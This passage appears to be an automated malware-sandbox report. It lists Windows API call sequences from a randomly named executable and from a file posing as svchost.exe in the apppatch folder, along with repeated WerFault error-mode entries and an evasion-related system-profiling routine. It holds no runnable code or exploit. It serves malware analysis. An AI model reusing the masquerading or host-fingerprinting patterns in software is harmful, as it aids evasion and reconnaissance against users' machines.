Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_0069CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_0069CDC0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_0069CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_0069CDC0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_0069CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_0069CDC0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_00699ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,5_2_00699ED0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_0069CFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_0069CFE9
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_0069CFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_0069CFE9
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014DD300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,6_2_014DD300
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014DCD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,6_2_014DCD50
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014DCDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_014DCDC0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014DCDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_014DCDC0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014DCDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_014DCDC0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014DCDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_014DCDC0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014DCFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_014DCFE9
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014DCFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_014DCFE9
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014D9ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,6_2_014D9ED0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BC5720 GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,RtlAddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,2_2_02BC5720
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BB4B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,IsUserAnAdmin,IsUserAnAdmin,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 2_2_02BB4B00
